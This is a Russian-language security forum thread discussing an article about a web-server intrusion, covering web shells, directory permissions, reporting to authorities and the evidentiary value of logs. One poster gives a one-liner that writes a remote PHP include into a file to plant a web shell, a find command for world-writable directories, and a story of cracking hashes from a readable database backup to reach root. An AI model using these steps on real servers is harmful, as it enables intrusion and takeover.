Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: 1 2 3 4 5 След.
RSS
Хроника инцидента
 
Обсуждение статьи Хроника инцидента
 
гм.. автор немного самоуверен а так ничего статейка...
вообще если директория на запись есть то можно залить и без этих программ ...
(echo lt;? include("http://xxx" ? gt; gt;xxx.php)
найти такую диру то же не проблема? команды же можно исполнять..
вопрос тока что потом можно поднять с этого вебшела... хотя бывали в моей жизнь моменты когда казалось неприступные серваки оказывались беззащитны перед СИ и криворукостью админов, например один раз нашел в бэкапах базы mysql на чтение слил поти 30 метров расковырял и нашел у них в одной табличке хеши паролей, перебрал по словарю попробовал и подобрал таки пароли юзера посмотрел его history а там уже и рут был..., а изначально все было так же как в статье практически ничего нельзя сделать.. тут надо было chroot и иже с ним и грамотно права настроить.
автору респект за пару новых мыслей в моей голове.
 
Цитата
ams666 пишет:

вообще если директория на запись есть то можно залить и без этих программ ...
(echo lt;? include("http://xxx" ? gt; gt;xxx.php)
найти такую диру то же не проблема? команды же можно исполнять..
О такой возможности явно написано в статье, Вы видимо просто не заметили этого. Но в описанном случае дело от этого не меняется, поскольку в структуре каталогов, доступной Apache, нет открытых для доступа на запись каталогов. Следовательно, запустить такой скрипт из Web-shell не удастся.
 
нет я конечно понимаю что нет но ТАК бывает очень редко... может на этом каталоге-сайте нет а на другом есть(сюда по описанию у него там не один сайт хостится значит find / -perm -2 -ls)... на 95% случаев залиться можно... по собственному опыту говорю.. но если админ параноик то да..
вообще мало информации для вывода... нет же результатов команд даже приблизительных... спорить не буду
 
ну что ж.. перечитал посмотрел всю инфу которую мог нарыть.. многое разъяснилось..
что ж я думал автор хостингом занимается или на крайняк где-то хостится, а так если сайт 1 на серванте то можно и попасть в оставшиеся 5 процентов:) такие случаи я не рассматривал но для остального выше приведенные рассуждения верны..
 
перечитал, много думал
 
прелюбопытное явление.. в сайты учавствующие в этой истории либо выдают 403 (может правда только для меня) либо перенаправляют на dosug.ru
дак может все таки взлом был?
 
Цитата
ams666 пишет:
прелюбопытное явление.. в сайты учавствующие в этой истории либо выдают 403 (может правда только для меня) либо перенаправляют на dosug.ru
дак может все таки взлом был?
Нет, причина в том, что мне на несколько минут было нужно полностью закрыть доступ к дереву каталогов Apache и вы попали именно в это время.
 
понятно сам вижу... форум понравился только не приходит письмо с регистрацией...
сорри за оффтоп.
 
Цитата
ams666 пишет:
понятно сам вижу... форум понравился только не приходит письмо с регистрацией...
сорри за оффтоп.
Сервер mail.ru говорит - User unknown [IMG]http://www.securitylab.ru/forum/smileys/smiley9.gif[/IMG]
 
непонятно адрес рабочий...:(
я в аську стукался если что не пугайтесь (опять сорри за оффтоп)
 
Нормальные люди давно поняли что phpbb дырявое решето и смигрировали на что-нибудь более стабильное. Остальные сидят и постоянно патчатся. А не успевают пропатчить - восстанавливаются из бэкапов (если таковые есть).
Но ради чего народ является приверженцами этого дырявого форума - понять не могу никак.
З.Ы. Вообще для защиты можно поставить и настроить mod_security для апача - хоть как-то поможет.
 
хм, если автор так жаждал крови, так по чему не обратился к властям: то же ФСБ или "К". Или он для красного словца писал , что послал уведомления админам с логами ? Типа лог самому написать нельзя с нужными адресами. Инфы о пользователе он все равно не имеет права дать, а предъявить ему, по переслатому логу, будет проблематично.

Зы: не берусь судить о качестве статьи, но она написана в сильно самоуверенном тоне имхо и рассматривает ситуацию со стороны "все равно бы он мне ничего не сделал, я весь в броне".
 
Цитата
zX15tQ пишет:
хм, если автор так жаждал крови, так по чему не обратился к властям: то же ФСБ или "К". Или он для красного словца писал , что послал уведомления админам с логами ?
Крови я не жажадал, потому и не считаю нужным обращаться в правоохранительные органы. Наверное с формальной точки зрения человека можно было привлечь к ответственности, но мне этот инцидент не представляется достаточным основанием для таких действий.

Логи действительно отправлены и у меня сохранились копии, но ведь их, как и логи, я мог просто сфабриковать "ради красного словца".
 
о чем я и сказал, что твои логи для них ничего, так как они легко модифицируются и послать таких логов может почти каждый. Это конечно не повод не предпринимать ни чего, но и писать об этом имхо не стоило. А по статье, ну имхо ничего нового, хотя все равно приятно что народ пишет :).
 
кстати, на любом форуме есть папка, в которую можно залить скрипт и запустить его от туда. это либо uploads, либо avatars. усли они закрыты на запись или чтение - значит форум не будет работать. а если стоит пхп, а он обязательно стоит, ибо форум, то прав execute не требуется. нужны лишь права на чтение. вот так.
 
Цитата
coyl пишет:
кстати, на любом форуме есть папка, в которую можно залить скрипт
Если не секрет, на чем основана такая уверенность?
 
2 zX15tQ. Господин имеет большой опыт в расследовании компьютерных инцидентов и взаимодействии с российскими правоохранительными органами?
Если ты посылаешь "левые" логи, ты сам попадпешь под статью, если что. В любом случае - журанлы являются коственным доказательством, и должны пройти через экспертизу.

Хотя в данном случае, когда общение с админами происходило неформально, разницы особой нет. Это показывает уровень нашей службы abuse у провайдеров (точнее её отсутсвие).
 
Цитата
offtopic пишет:
Это показывает уровень нашей службы abuse у провайдеров (точнее её отсутсвие).
Я бы не стал так строго судить администраторов. Более того, мой личный опыт показывает, что обращения на abuse обчно достаточно эффективны (по крайней мере в случае крупных компаний-провайдеров) и описанный случай (на мой взгляд) скорее исключение, нежели правило. Возможно мне просто везет на отзывчивых админитсраторов
[IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG]
 
Состав преступления есть?
Похищена материальная или интелектуальная собственность?
Заявление подать можно, но расследования не будет по причинам отрицательного ответа на два первых вопроса.
Мелкое хулиганство? :)
Страницы: 1 2 3 4 5 След.
Читают тему (гостей: 1)